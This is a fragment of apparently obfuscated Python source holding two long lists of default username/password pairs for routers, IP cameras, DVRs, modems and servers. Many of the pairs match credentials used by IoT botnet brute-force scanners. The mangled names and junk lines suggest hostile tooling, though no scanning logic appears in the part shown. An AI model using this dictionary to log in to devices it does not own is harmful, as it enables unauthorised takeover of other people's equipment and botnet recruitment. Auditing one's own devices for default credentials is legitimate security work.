"admin/admin1234" ,
"admin/12345" ,
"admin/123456" ,
"admin/1111" ,
"root/Zte521" ,
"root/jvbzd" ,
"user/user" ,
"admin/smcadmin" ,
"guest/guest" ,
"root/dreambox" ,
"root/zlxx." ,
"ubnt/ubnt" ,
"root/cat1029" ,
"root/hunt5759" ,
"root/adminpassword" ,
"root/5up" ,
"admin/zhone" ,
"admin/admin1" ,
"root/" ,
"admin/epicrouter" ,
"root/123456" ,
"root/antslq" ,
"admin/admin123" ,
"supervisor/zyad1234" ,
"admin/1234567890" ,
"superadmin/Is$uper@dmin" ,
"admin/ho4uku6at" ,
"support/admin" ,
"root/123" ,
"root/1234567890" ,
"1234/1234" ,
"admin/54321" ,
"root/win1dows" ,
"admin/" ,
"root/888888" ,
"admin/888888" ,
"root/Win1doW$" ,
"mg3500/merlin" ,
"root/oelinux123" ,
"ubnt/ubnt" ,
"admin/0000" ,
"admin/11111111" ,
"admin/4321" ,
"admin/654321" ,
"admin/666666" ,
"root/000000" ,
"root/founder88" ,
"root/1111" ,
"admin/system" ,
"guest/123456" ,
"root/666666" ,
"root/0000" ,
"root/Admin" ,
"root/00000" ,
"root/root123" ,
"root/ipcam_rt5350" ,
"guest/guest123" ,
"root/1" ,
"root/win1dows" ,
"Admin/Admin" ,
"ONTUSER/SUGAR2A041" ,
'admin/P@55w0rd!' ,
'123/123' ,
]
if 76 - 76: i1 . OOooOO0 / I11I1Ii * I11I1Ii
iiIO0OOoo = [
'/' ,
"0/0" ,
"1111/1111" ,
"111111/111111" ,
"11111111/11111111" ,
"11111/x-admin" ,
'123/123' ,
"1234/1234" ,
"1502/1502" ,
"22222222/22222222" ,
"266344/266344" ,
"2800/2800" ,
"XXX:3500/24:123456" ,
"XXX:3500/24:pass" ,
"XXX:3500/24:12345" ,
"XXX:3500/24:3500/24" ,
"XXX:3500/24:h179350" ,
"3comcso/RIP000" ,
"666666/666666" ,
"7654321/7654321" ,
"888888/888888" ,
"a/a" ,
"aaa/" ,
"abarco/mistral5885" ,
"acc/acc" ,
"adfexc/adfexc" ,
"admin/" ,
'Admin/' ,
"admin/0" ,
"admin/0000" ,
"admin/1111" ,
"aDMIN/1111" ,
"admin/1111111" ,
"admin/11111111" ,
"admin/1111Admin" ,
"admin/123" ,
"Admin/123" ,
"admin/1234" ,
"Admin/1234" ,
"admin/12345" ,
"admin/123456" ,
"aDMIN/123456" ,
"Admin/123456" ,
"admin/1234567890" ,
"admin/123456Admin" ,
"Admin/123456Admin" ,
"admin/12345Admin" ,
"admin/1234admin" ,
"admin/123Admin" ,
"admin/12888" ,
"Admin/12888" ,
"admin1/password" ,
"admin/2222" ,
"admin/22222" ,
"admin/22222Admin" ,
"admin/2601hx" ,
"admin2/changeme" ,
"admin/362729" ,
"Admin/3UJUh2VemEfUte" ,
"admin/4321" ,
"admin/54321" ,
"Admin/5up" ,
"admin/654321" ,
"admin/666666" ,
"admin/7ujMko0admin" ,
"admin/7ujMko0vizxv" ,
"admin/888888" ,
"admin/9999" ,
"admin/99999999" ,
"admin/abc123" ,
"admin/access" ,
"admin/admin" ,
"admin/ADMIN" ,
"Admin/admin" ,
"Admin/Admin" ,
"ADMIN/ADMIN" ,
"admin/admin00" ,
'admin/admin01' ,
"admin/admin1" ,
"admin/admin123" ,
"admin/Admin123" ,
"admin/admin1234" ,
"admin/admin99" ,
"admin/Administration" ,
"admin/administrator" ,
"admin/adslolitec" ,
"admin/adslroot" ,
'admin/adslnadam' ,
"admin/Ait" ,
"admin/AitbISP4eCiG" ,
"admin/articon" ,
"admin/asante" ,
"admin/Ascend" ,
"admin/asd" ,
"Admin/atc456" ,
"admin/atlantis" ,
"admin/aquario" ,
"admin/Aquario" ,
"admin/barricade" ,
"admin/bayandsl" ,
"admin/BGCVDSL2" ,
"admin/bintec" ,
"admin/cableroot" ,
"admin/cciadmin" ,
"admin/CenturyL1nk" ,
"admin/changeme" ,
"admin/cisco" ,
"admin/COadmin123" ,
"admin/comcomcom" ,
"admin/conexant" ,
"admin/c@ntv2000" ,
"admin/default" ,
"admin/detmond" ,
"admin/diamond" ,
"admin/dvr2580222" ,
"admin/epicrouter" ,
"admin/extendnet" ,
"admin/fliradmin" ,
"admin/giraff" ,
"admin/gvt12345" ,
"admin/h@32LuyD" ,
"admin/hagpolm1" ,
"admin/hello" ,
"admin/ho4uku6at" ,
"admin/hp.com" ,
"admin/htc" ,
"Admin/huawei.com" ,
"admin/imss7.0" ,
"admin/ip20" ,
"admin/ip3000" ,
"admin/ip400" ,
"admin/ironport" ,
"admin/isee" ,
"Administrator/" ,
"administrator/1234" ,
"Administrator/-%).3-" ,
"Administrator/3!play" ,
"Administrator/3ware" ,
"Administrator/admin" ,
"administrator/administrator" ,
"ADMINISTRATOR/ADMINISTRATOR" ,
"Administrator/buh" ,
"Administrator/changeme" ,
"administrator/d1scovery" ,
"Administrator/ganteng" ,
"Administrator/ggdaseuaimhrke" ,
"Administrator/letmein" ,
"Administrator/password" ,
"Administrator/pilou" ,
"Administrator/public" ,
"Administrator/smcadmin" ,
'admin/2008x2BJAOTOtJK1' ,
'admin/2008B6ByVO_utFJ3' ,
'admin/2008x2CzFWOtTMWE' ,
"admin/ecom" ,
'admin/GPAdm1n_w1max' ,
'admin/hamlet' ,
'admin/hayesadsl' ,
"admin/jvc" ,
"admin/JVC" ,
"admin/kont2004" ,
"admin/linga" ,
"admin/Meins" ,
"admin/meinsm" ,
"admin/michaelangelo" ,
"admin/michelangelo" ,
"admin/microbusiness" ,
"admin/motorola" ,
"admin/mu" ,
"admin/my_DEMARC" ,
"admin/nCwMnJVGag" ,
"admin/netadmin" ,
"admin/NetCache" ,
"admin/noway" ,
"admin/none" ,
"admin/OCS" ,
"admin/operator" ,
"admin/P@55w0rd!" ,
"admin/password" ,
"admin/pentagram" ,
"admin/pfsense" ,
"adminpldt/0123456789" ,
"adminpldt/12345676890" ,
"adminpldt/1234567890" ,
"admin/power" ,
"admin/Protector" ,
"admin/public" ,
"admin/pwp" ,
"admin/QwestM0dem" ,
"admin/radius" ,
"admin/rmnetlm" ,
"admin/root" ,
"admin/secure" ,
"admin/setup" ,
"admin/Sharp" ,
"admin/sitecom46" ,
"admin/skbiptv" ,
"admin/skb_wifi" ,
"admin/sky" ,
"admin/smallbusiness" ,
"admin/smcadmin" ,
"adminstat/OCS" ,
"adminstrator/changeme" ,
"Adminstrator/changeme" ,
"admin/superuser" ,
"admin/su@psir" ,
"admin/switch" ,
"admin/symbol" ,
"admin/synnet" ,
"admin/sysAdmin" ,
"admin/system" ,
"admintelecom/telecomadmin" ,
"admin/test" ,
"admin/test1" ,
'admin/telus177' ,
"admin/trendchip" ,
"admin/true" ,
"admin/tsunami" ,
"adminttd/adminttd" ,
"admin/Uq-4GIt3M" ,
"adminuser/OCS" ,
"admin/utstar" ,
"adminview/OCS" ,
"admin/visual" ,
"admin/vnpt" ,
"admin/w2402" ,
"admin/wbox" ,
"admin/xad$l#12" ,
"admin/x-admin" ,
"admin/zhone" ,
"admin/zoomadsl" ,
'admin/ZmqVfoSIP' ,
"ADMN/admn" ,
"adsl/adsl1234" ,
"ADSL/expert03" ,
"ADVMAIL/HP" ,
"ADVMAIL/HPOFFICE" ,
'Afaq_shamel/stccpe_2007' ,
"Alphanetworks/firmware" ,
"Alphanetworks/wapnd03cm_dkbs_dap2555" ,
"Alphanetworks/wapnd04cm_dkbs_dap3525" ,
"Alphanetworks/wapnd15_dlob_dap1522b" ,
"Alphanetworks/wrgac01_dlob.hans_dir865" ,
"Alphanetworks/wrgg15_di524" ,
"Alphanetworks/wrgg19_c_dlwbr_dir300" ,
"Alphanetworks/wrgn22_dlwbr_dir615" ,
"Alphanetworks/wrgn23_dlwbr_dir300b" ,
"Alphanetworks/wrgn23_dlwbr_dir600b" ,
"Alphanetworks/wrgn28_dlob_dir412" ,
"Alphanetworks/wrgn39_dlob.hans_dir645" ,
"Alphanetworks/wrgn39_dlob.hans_dir645_V1" ,
"Alphanetworks/wrgn49_dlob_dir600b" ,
"Alphanetworks/wrgnd08_dlob_dir815" ,
"anonymous/any@" ,
"anonymous/Exabyte" ,
"Any/12345" ,
"apache/apache" ,
"apc/apc" ,
"arris/admin" ,
"ascend/ascend" ,
"at4400/at4400" ,
"baby/baby" ,
"backup/backup" ,
"bbsd-client/changeme2" ,
"bbsd-client/changeme2database" ,
"bbsd-client/NULL" ,
"bciim/bciimpw" ,
"bcim/bcimpw" ,
"bcms/bcmspw" ,
"bcnas/bcnaspw" ,
"bewan/bewan" ,
"bin/12345" ,
"blue/bluepw" ,
"browse/browsepw" ,
"browse/looker" ,
"cablecom/router" ,
"cablemodem/robotics" ,
"cac_admin/cacadmin" ,
'caimore/caimore' ,
"cas/cascade" ,
"ccrusr/ccrusr" ,
"cellit/cellit" ,
"centos/centos" ,
"cgadmin/cgadmin" ,
"cisco/cisco" ,
"cisco/CISCO" ,
"Cisco/Cisco" ,
"citel/password" ,
"cjadmin/CJHV_ap_0601" ,
"client/client" ,
"cmaker/cmaker" ,
"comcast/1234" ,
"comcast/comcast" ,
"corecess/corecess" ,
"craft/craft" ,
"craft/craftpw" ,
"craft/crftpw" ,
"CRAFTSPERSON/ALC#FGU" ,
"csgoserver/csgoserver" ,
"CSG/SESAME" ,
"cusadmin/highspeed" ,
"cust/custpw" ,
"customer/none" ,
"dadmin/dadmin01" ,
"daemon/" ,
"daemon/daemon" ,
"davox/davox" ,
"debug/d.e.b.u.g" ,
"debug/synnet" ,
"default/" ,
"default/default" ,
"default/video" ,
"demo/demo" ,
"deploy/deploy" ,
"deskalt/password" ,
"deskman/changeme" ,
"desknorm/password" ,
"deskres/password" ,
"dev/dev" ,
"device/device" ,
"dhs3mt/dhs3mt" ,
"dhs3pms/dhs3pms" ,
"diag/danger" ,
"diag/switch" ,
"disttech/4tas" ,
"dlink/default" ,
"dlink/dlink" ,
"D-Link/D-Link" ,
"DLink/DLink" ,
"dm/telnet" ,
"draytek/1234" ,
"draytek/1234Admin" ,
"DTA/TJM" ,
"e250/e250changeme" ,
"e500/e500changeme" ,
"echo/echo" ,
"edimax/software01" ,
"eng/engineer" ,
"engmode/hawk201" ,
"enquiry/enquirypw" ,
"epicrouter/admin" ,
"Factory/56789Admin" ,
"FIELD/HPONLY" ,
"FIELD/HPP187 SYS" ,
"FIELD/HPWORD PUB" ,
"FIELD/LOTUS" ,
"FIELD/MANAGER" ,
"FIELD/MGR" ,
"FIELD/SERVICE" ,
"field/support" ,
"FIELD/SUPPORT" ,
"ftp_admi/kilo1987" ,
"ftp/ftp" ,
"ftp_inst/pbxk1064" ,
"ftp_nmc/tuxalize" ,
"ftp_oper/help1954" ,
"ftpuser/asteriskftp" ,
"ftpuser/ftpuser" ,
"Geardog/Geardog" ,
"GEN1/gen1" ,
"GEN2/gen2" ,
"git/git" ,
"GlobalAdmin/GlobalAdmin" ,
"Glo/Glo" ,
"guest/12345" ,
"guest/123456" ,
"guest/54321" ,
"guest/guest" ,
"Guest/Guest" ,
"guest/guest123" ,
'guest/friend' ,
"guest/truetime" ,
"guest/user" ,
"guest/xc3511" ,
"hadoop/hadoop" ,
"halt/tlah" ,
"HELLO/FIELD.SUPPORT" ,
"HELLO/MANAGER.SYS" ,
"HELLO/MGR.SYS" ,
"HELLO/OP.OPERATOR" ,
"helpdesk/OCS" ,
'home/zonnet' ,
"homebro/homebro" ,
"homeultera/homeultera" ,
"hsa/hsadb" ,
"hsa/hsasdb" ,
"hscroot/abc123" ,
"HTTP/HTTP" ,
"ibm/password" ,
"iclock/timely" ,
"inads/inads" ,
"inads/indspw" ,
"info/info" ,
"init/initpw" ,
"installer/installer" ,
"install/llatsni" ,
"install/secret" ,
"integrator/p1nacate" ,
"intel/intel" ,
"intermec/intermec" ,
"IntraStack/Asante" ,
"IntraSwitch/Asante" ,
"JDE/JDE" ,
"jenkins/jenkins" ,
"kermit/kermit" ,
"kpn/kpn-adsl" ,
"kroot/nespot" ,
"ktuser/homehub" ,
"ktuser/megaap" ,
"l2/l2" ,
"l3/l3" ,
"Linksys/admin" ,
"live/live" ,
"locate/locatepw" ,
'localadmin/localadmin' ,
"login/0" ,
"login/1111" ,
"login/8429" ,
"login/access" ,
"login/admin" ,
"login/pass" ,
"login/password" ,
"login/user" ,
"lp/lp" ,
"LUCENT01/UI-PSWD-01" ,
"LUCENT02/UI-PSWD-02" ,
"m1122/m1122" ,
"MAIL/HPOFFICE" ,
"MAIL/MAIL" ,
"MAIL/MPE" ,
"MAIL/REMOTE" ,
"MAIL/TELESUP" ,
"maint/maint" ,
"maint/maintpw" ,
"maint/ntacdmax" ,
"maint/rwmaint" ,
"manage/!manage" ,
"Manage/Manage" ,
"Management/TestingR2" ,
"manage/password" ,
"Manager/" ,
"manager/admin" ,
"MANAGER/COGNOS" ,
"manager/friend" ,
"Manager/friend" ,
"MANAGER/HPOFFICE" ,
"MANAGER/ITF3000" ,
"manager/manager" ,
"Manager/Manager" ,
"MANAGER/SECURITY" ,
"MANAGER/SYS" ,
"MANAGER/TCH" ,
"MANAGER/TELESUP" ,
"manuf/xxyyzz" ,
"MD110/help" ,
"MDaemon/MServer" ,
"mediator/mediator" ,
"MegaVNN/MegaVNN" ,
"memotec/supervisor" ,
"Menara/Menara" ,
"mg3500/merlin" ,
"MGR/CAROLIAN" ,
"MGR/CCC" ,
"MGR/CNAS" ,
"MGR/COGNOS" ,
"MGR/CONV" ,
"MGR/HPDESK" ,
"MGR/HPOFFICE" ,
"MGR/HPONLY" ,
"MGR/HPP187" ,
"MGR/HPP189" ,
"MGR/HPP196" ,
"MGR/INTX3" ,
"MGR/ITF3000" ,
"MGR/NETBASE" ,
"MGR/REGO" ,
"MGR/RJE" ,
"MGR/ROBELLE" ,
"MGR/SECURITY" ,
"MGR/SYS" ,
"MGR/TELESUP" ,
"MGR/VESOFT" ,
"MGR/WORD" ,
"MGR/XLSERVER" ,
"MICRO/RSX" ,
"micros/micros" ,
"minecraft/minecraft" ,
"mlusr/mlusr" ,
"monitor/monitor" ,
"mother/fucker" ,
"mountsys/mountsys" ,
"mso/w0rkplac3rul3s" ,
"mtch/mtch" ,
"mtcl/mtcl" ,
"museadmin/Muse!Admin" ,
"mysql/mysql" ,
"naadmin/naadmin" ,
"nagios/nagios" ,
"NAU/NAU" ,
"netadmin/nimdaten" ,
"netgear/netgear" ,
"netman/" ,
"netman/netman" ,
"netopia/netopia" ,
"netrangr/attack" ,
"netscreen/netscreen" ,
"NETWORK/NETWORK" ,
"NICONEX/NICONEX" ,
"nms/nmspw" ,
"nobody/nobody" ,
"nobody/tmadmin" ,
"none/0" ,
"none/0Admin" ,
"none/4getme2" ,
"none/admin" ,
"none/admin00" ,
"none/ascend" ,
"none/backdoor" ,
"none/BRIDGE" ,
"none/Col2ogro2" ,
"none/Helpdesk" ,
"none/laflaf" ,
"none/Master" ,
"none/NetICs" ,
"none/Posterie" ,
"none/smcadmin" ,
"none/Super" ,
"none/xdfk9874t3" ,
"ONTUSER/SUGAR2A041" ,
"openlgtv/openlgtv" ,
"operator/1234User" ,
"operator/$chwarzepumpe" ,
"OPERATOR/COGNOS" ,
"operator/col1ma" ,
"OPERATOR/DISC" ,
"operator/mercury" ,
"operator/operator" ,
"OPERATOR/SUPPORT" ,
"OPERATOR/SYS" ,
"OPERATOR/SYSTEM" ,
"op/op" ,
"op/operator" ,
"oracle/oracle" ,
"osmc/osmc" ,
"patrol/patrol" ,
"PBX/PBX" ,
"PCUSER/SYS" ,
"PFCUser/240653C9467E45" ,
"piranha/piranha" ,
"piranha/q" ,
"pi/raspberry" ,
"PlcmSpIp/PlcmSpIp" ,
"pldtadmin/1234567890" ,
"poll/tech" ,
"Polycom/SpIp" ,
"pos/pos" ,
"postgres/postgres" ,
"PRODDTA/PRODDTA" ,
"PSEAdmin/$secure$" ,
"public/public" ,
"quser/quser" ,
"radware/radware" ,
"rapport/r@p8p0r+" ,
"rcust/rcustpw" ,
"readonly/lucenttech2" ,
"readwrite/lucenttech1" ,
"recovery/recovery" ,
"replicator/replicator" ,
"RMUser1/password" ,
"!root/" ,
"root/" ,
"root/0" ,
"root/0000" ,
"root/00000" ,
"root/000000" ,
"root/00000000" ,
"root/1" ,
"root/1001chin" ,
"root/1111" ,
"root/123" ,
"root/123123" ,
"root/1234" ,
"root/12341234" ,
"root/12345" ,
"root/123456" ,
"root/1234567" ,
"root/1234567890" ,
"root/1234qwer" ,
"root/1234User" ,
"root/20080826" ,
"root/2222222" ,
"root/22222222" ,
"root/33333333" ,
"root/321" ,
"root/33" ,
"root/333" ,
"root/3ep5w2u" ,
"root/4321" ,
"root/54321" ,
"root/5up" ,
"root/654321" ,
"root/666666" ,
"root/696969" ,
"root/7ujMko0admin" ,
"root/7ujMko0vizxv" ,
"root/888888" ,
"root/a6a7wimax" ,
"root/admin" ,
"root/Admin" ,
"root/admin99" ,
"root/admin_1" ,
"root/adminpassword" ,
"root/ahetzip8" ,
"root/alpine" ,
"root/anko" ,
"root/antslq" ,
"root/ascend" ,
'root/asmcadmin' ,
"root/attack" ,
"root/avtech" ,
"root/awind5885" ,
"root/b120root" ,
"root/blender" ,
"root/calvin" ,
"root/camera" ,
"root/cat1029" ,
"root/changeme" ,
"root/Cisco" ,
"root/cms500" ,
"root/comcom" ,
"root/coolphoenix579" ,
"root/davox" ,
"root/default" ,
"root/dreambox" ,
"root/dreambox" ,
"root/fivranne" ,
"root/founder88" ,
"root/ggdaseuaimhrke" ,
"root/GM8182" ,
"root/GMB182" ,
"root/hi3518" ,
"root/huigu309" ,
"root/hunt5759" ,
"root/iDirect" ,
"root/ikwb" ,
"root/ikwd" ,
"root/indigo" ,
"root/inflection" ,
"root/ipcam_rt5350" ,
"root/juantech" ,
"root/jvbzd" ,
"root/klv123" ,
"root/klv1234" ,
"root/letacla" ,
"root/LSiuY7pOmZG2s" ,
"root/Mau'dib" ,
"root/maxided" ,
"root/oelinux123" ,
"root/openvpnas" ,
"root/oracle" ,
"root/orion99" ,
"root/pa55w0rd" ,
"root/pass" ,
"root/password" ,
"root/PASSWORD" ,
"root/permit" ,
"root/qwerty" ,
"root/realtek" ,
"root/reecam4debug" ,
"root/root" ,
"root/root123" ,
"root/root1234" ,
"root/root12345" ,
"root/root123456" ,
"root/ROOT500" ,
"root/root54321" ,
"root/samsung" ,
"root/Serv4EMC" ,
"root/skb_ipdcp" ,
"root/system" ,
"root/t0talc0ntr0l4!" ,
"root/tiger" ,
"root/tini" ,
"root/toor" ,
"root/tslinux" ,
"root/ttnet" ,
"root/u" ,
"root/ubnt" ,
"root/user" ,
'root/vertex25ektks123' ,
"root/video" ,
"root/vizxv" ,
"root/Win1doW$" ,
"root/win1dows" ,
'root/wind5885' ,
"root/W!n0&oO7." ,
"root/wyse" ,
"root/xc3511" ,
"root/xmhdipc" ,
"root/zlxx." ,
"root/zsun1188" ,
"root/Zte521" ,
"root/Zte521" ,
"root/zte9x15" ,
"ro/ro" ,
"router/router" ,
"RSBCMON/SYS" ,
"rwa/rwa" ,
"rw/rw" ,
"scmadmin/scmchangeme" ,
"scout/scout" ,
"security/security" ,
"Service/5678Service" ,
"service/service" ,
"service/smile" ,
"setup/changeme!" ,
"setup/changeme" ,
"setup/setup" ,
"simple/h3c" ,
"simple/huawei" ,
"smc/smcadmin" ,
"spcl/0" ,
"SPOOLMAN/HPOFFICE" ,
"steam/steam" ,
"storwatch/specialist" ,
"stratacom/stratauser" ,
"super/5777364" ,
"superadmin/Is$uper@dmin" ,
"superadmin/secret" ,
"superman/21241036" ,
"superman/superman" ,
"superman/talent" ,
"super/asong" ,
"super/super" ,
"super.super/master" ,
"super/surt" ,
"superuser/123456" ,
"superuser/123456special" ,
"superuser/admin" ,
"superuser/superuser" ,
"supervisor/PlsChgMe!" ,
"supervisor/PlsChgMe" ,
"supervisor/PlsChgMe1" ,
"supervisor/supervisor" ,
"supervisor/zyad1234" ,
"support/123456" ,
"support/admin" ,
"support/h179350" ,
"support/support" ,
"support/supportpw" ,
"susAdmin/Administrator" ,
"su/super" ,
"sweex/mysweex" ,
"Sweex/Mysweex" ,
"Symbol/Admin" ,
"sysadm/anicusc" ,
"sysadm/anicust" ,
"sysadmin/PASS" ,
"sysadmin/password" ,
"sysadmin/sysadmin" ,
"sysadm/sysadm/" ,
"sysadm/sysadm" ,
"SYSADM/sysadm" ,
"SYSDBA/masterkey" ,
"system/password" ,
"system/shell" ,
"system/sys" ,
"sys/uplink" ,
"target/password" ,
"teacher/password" ,
"teamspeak/teamspeak" ,
"tech/" ,
"tech/field" ,
"tech/tech" ,
"teladmin/telpwd" ,
"telco/telco" ,
"tele2/tele2" ,
"telecomadmin/******" ,
"telecomadmin/admintelecom" ,
"telecomadmin/n" ,
"telecomadmin/nE7jA%5m" ,
"telecomadmin/telecomadmin" ,
"telecom/telecom" ,
'telekom/telekom' ,
"tellabs/tellabs#1" ,
"telnet/telnet" ,
"temp1/password" ,
"test1/test1" ,
"test/test" ,
"test/test1" ,
"test/test123" ,
"testuser/testuser" ,
"tiara/tiaranet" ,
"tiger/tiger123" ,
"tmadmin/tmadmin" ,
"tmuser/tmuser" ,
"tomcat/tomcat" ,
"topicalt/password" ,
"topicnorm/password" ,
"topicres/password" ,
"true/true" ,
"tw/tw" ,
"tw007/tw007" ,
"u/u" ,
"ubnt/ubnt" ,
"UBNT/UBNT" ,
"ubuntu/ubuntu" ,
"upgrade/Th0ms0n!" ,
"user3/1234" ,
"user3/12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678" ,
"USERID/PASSW0RD" ,
"user/admin" ,
"User/Kulacom" ,
"user/pass" ,
"user/password" ,
"User/Password" ,
"user/power" ,
"user/public" ,
"user/pu" ,
"user/tivonpw" ,
"user/user" ,
"usuario/usuario" ,
"vagrant/vagrant" ,
"vcr/NetVCR" ,
'virgin/password' ,
"vnc/vnc" ,
"VNC/winterm" ,
'vodafone/vodafone' ,
"volition/volition" ,
"vstarcam2015/20150602" ,
"vt100/public" ,
"VTech/VTech" ,
"vyatta/vyatta" ,
'wbrnet/183$729' ,
"webadmin/1234" ,
"webadmin/webadmin" ,
"webmaster/webmaster" ,
"websecadm/changeme" ,
"wlseuser/wlsepassword" ,
"wlse/wlsedb" ,
"WP/HPOFFICE" ,
"Wproot/cat1029" ,
"wradmin/trancell" ,
"write/private" ,
"www/www" ,
"xbox/xbox" ,
"xd/xd" ,
"zabbix/zabbix" ,
"ZXDSL/ZXDSL" ,
"zyuser/1234" ,
'zyad1234/zyad1234' ,
'admin/vizxv' ,
'supervisor/zyad5001' ,
'Mroot/cat1029' ,
'root/aquario' ,
'admin/cat1029' ,
'root/7ujMko0vizxv ' ,
'root/ivdev' ,
'guest1/guest1' ,
'superadmin/' ,
'support/user' ,
'root/zyad5001' ,
'default/antslq' ,
'root/00' ,
'admin/ipcam_rt5350' ,
'root/1111111' ,
'root/12345678' ,
'root/333333' ,
'superadmin/Is@dmin' ,
'support/123' ,
'admin/zyad5001' ,
'admin/support' ,
'root/smcadmin' ,
'admin/pass' ,
'root/qazxsw' ,
'guest/' ,
'root/3333333' ,
'admin/12341234' ,
'support/1234' ,
'root/3' ,
'root/!root' ,
'/1234' ,
'admin/5up' ,
'bin/' ,
'netgear/admin' ,
'root/oelinux1234' ,
'admin/QuestM0dem' ,
'admin/ttnet' ,
'admin/service' ,
'support/' ,
'Admin/Password' ,
'root/hdipc%No' ,
'adm/' ,
'super.super/' ,
'administrator/changeme' ,
'root/555555' ,
'home/12345678' ,
'admin/meinsm' ,
'root/9999' ,
'user/' ,
'cusadmin/password' ,
'user/123456' ,
'root/1988' ,
'root/jv' ,
'root/555' ,
'root/3ep5w2u' ,
'admin/zhongxing' ,
'admin/ca' ,
'guest/VTech' ,
'root/33333' ,
'root/11111111' ,
'root/root4321' ,
'admin/adslnadam' ,
'guest/1111' ,
'enable/cisco' ,
'admin/7772000' ,
'login/comcast' ,
'root/zhongxing' ,
'test/' ,
'adminstrator/meinsm' ,
'support/12345' ,
'Administrator/meinsm' ,
'support/password' ,
'sys/sys' ,
'admin/vertex25ektks123' ,
'admin/Win1doW$' ,
'admin/xad#12' ,
'Admin/smcadmin' ,
'root/xc251' ,
'root/support' ,
'support/pass' ,
'root/0P3N' ,
'root/Administrator' ,
'svn/svn' ,
'admin/zsun1188' ,
'user/1234' ,
'root/3333' ,
'admin/8D8E' ,
'root/777' ,
'admin/ztonpk' ,
'Conf/admin' ,
'root/asdfgh' ,
'default/123456' ,
'sysadm/admin' ,
'root/alien' ,
'support/telnet' ,
'admin/44444' ,
'alice/alice' ,
'0000/0000' ,
'user/raspberry' ,
'test/guest' ,
'root/123qwe' ,
'root/vI' ,
'supervisor/enable' ,
'/clear123' ,
'service/enable' ,
'root/reecam4de' ,
'cisco/default' ,
'root/annie2012' ,
'sh/shell' ,
'osteam/5up' ,
'root/wsxzaq' ,
'root/xc3518' ,
'admin/guest' ,
'root/xc3515' ,
'support/qrst' ,
'1/1' ,
'root/VTech' ,
'admin/7' ,
'admin/qwerty' ,
'netgear/VTech' ,
'admin/263297' ,
'root/letmein' ,
'servlet/manager' ,
'administrator/Amx1234!' ,
'user/manager' ,
'VUTS/VUTS' ,
'admin/444444' ,
'/0000' ,
'admin/Administrator' ,
'root/111111' ,
'netgear/Administrator' ,
'root/99999' ,
'netgear/root' ,
'root/qwertyuiop' ,
'/root' ,
'root/55555555' ,
'root/12' ,
'support/enable' ,
'/TRWW' ,
'guest/enable' ,
'support/root' ,
'admin/flvbyctnb' ,
'root/yankeessam40:1961' ,
'test/testing' ,
'pnadmin/pnadmin' ,
'sphinx/sphinx' ,
'admin/ghbdtn' ,
'admin/FERUM' ,
'admin/amvqnekk' ,
'admin/airlive' ,
'netgear/password' ,
'admin/9' ,
'webstar/webstar' ,
'root/2' ,
'support/cisco' ,
'admin/3333333' ,
'johnny/johnny' ,
'login/guest' ,
'xbmc/bananapi' ,
'ahetzip8/ahetzip8' ,
'support/vagrant' ,
'mgmt/mgmt' ,
'admin/0508780503' ,
'admin/vagrant' ,
'guest/password' ,
'admin/99' ,
'admin/00' ,
'login/manager' ,
'Administrator/Administrator' ,
'user/pi' ,
'admin/adminstrator' ,
'root/22' ,
'root/hi3511' ,
'root/public' ,
'cisco/password' ,
'admin/7BBC' ,
'admin/22' ,
'admin/RTadmin1979' ,
'admin/123456780' ,
'admin/<>' ,
'cisco/support' ,
'admin/2w4f6n8k' ,
'admin/Ferrum' ,
'guest/netgear' ,
'root/7777777' ,
'netgear/123456' ,
'admin/biyshs9eq' ,
'realtek/realtek' ,
'login/test' ,
'root/9999999' ,
'admin/99999' ,
'login/telnet' ,
'admin/tech' ,
'admin/&' ,
'postgres/postgrespass' ,
'/enable' ,
'admin/D-Link' ,
'netgear/1234' ,
'administrator/password' ,
'admin/1q2w3e' ,
'cisco/guest' ,
'bananapi/bananapi' ,
'root/44' ,
'ftp/password' ,
'login/cisco' ,
'admin/oelinux123' ,
'user/login' ,
'root/telnet' ,
'admin/hsparouter' ,
'root/grouter' ,
'Adminstrator/smcadmin' ,
'support/Administrator' ,
'admin/9999999' ,
'guest/ubnt' ,
'root/pi' ,
'cpanel/cf46e3bdb4b929f1' ,
'root/abc123' ,
'tyler/tyler' ,
'admin/adsladmin' ,
'root/comcast' ,
'root/666' ,
'ziggo/draadloos' ,
'guest/xc3611' ,
'ubnt/ubntenable' ,
'admin/cat' ,
'maint1/sx2000' ,
'guest/support' ,
'root/8888888' ,
'share/share' ,
'user/Administrator' ,
'admin/P' ,
'root/openssh' ,
'admin/beeline2013' ,
'admin/szt' ,
'dm3500/merlin' ,
'larry/larry' ,
'root/88888' ,
'LocalService/DV5800' ,
'airlive/airlive' ,
'admin/user' ,
'root/3e2w1q' ,
'mt7109/wimax' ,
'admin/letmein' ,
'guest/pass' ,
'admin/999999999' ,
'administrator/123' ,
'support/guest' ,
'daniel/daniel' ,
'prueba/prueba' ,
'guest/pi' ,
'login/D-Link' ,
'jeff/jeff' ,
'root/cisco' ,
'root/22222' ,
'user/vizxv' ,
'motherfucker/enable' ,
'admin/1234root' ,
'root/zlxx' ,
'admin/6' ,
'netgear/default' ,
'admin/555555' ,
'admin/raspberry' ,
'office/office' ,
'admin/ERRU$' ,
'svn/123456' ,
'admin/5' ,
'admin/zyxel' ,
'root/bananapi' ,
'admin/12' ,
'uucp/uucp' ,
'test/123456' ,
'download/download' ,
'ubnt/enable' ,
'tst/tst' ,
'cisco/1234' ,
'admin/netgear' ,
'root/77777777' ,
'ems/ems' ,
'admin/00000000' ,
'test/testtest' ,
'login/Administrator' ,
'guest/comcast' ,
'admin/asus' ,
'support/netgear' ,
'rob/rob' ,
'adsl/realtek' ,
'admin/555555555' ,
'cisco/12345' ,
'admin/Admin' ,
'/private' ,
'secret/secret' ,
'cisco/user' ,
'admin/5555555' ,
'user/D-Link' ,
'super/APR@xuniL' ,
'admin/33333333' ,
'engineer/amplifier' ,
'superdba/admin' ,
'nuucp/nuucp' ,
'admin/adsl' ,
'admin/beeline' ,
'admin/ipcamera' ,
'default/user' ,
'root/102030' ,
'root/nosoup4u' ,
'sh/sh' ,
'admin/internet' ,
'admin/free' ,
'noc/noc' ,
'root/222' ,
'______/______' ,
'QQQQQQ/QQQQQQ' ,
'kevin/kevin' ,
'root/qkrrud7502' ,
'root/66666666' ,
'root/8' ,
'ajay/ajay' ,
'netgear/pi' ,
'/admin' ,
'kyivstar/kyivstar' ,
'anonymous/anonymous' ,
'guest/vizxv' ,
'webftp/webftp123' ,
'root/t' ,
'gitlab/gitlab' ,
'root/Passw0rd' ,
'support/default' ,
'1234/1' ,
'3500/24' ,
'root/enable' ,
'password/enable' ,
'USER/x' ,
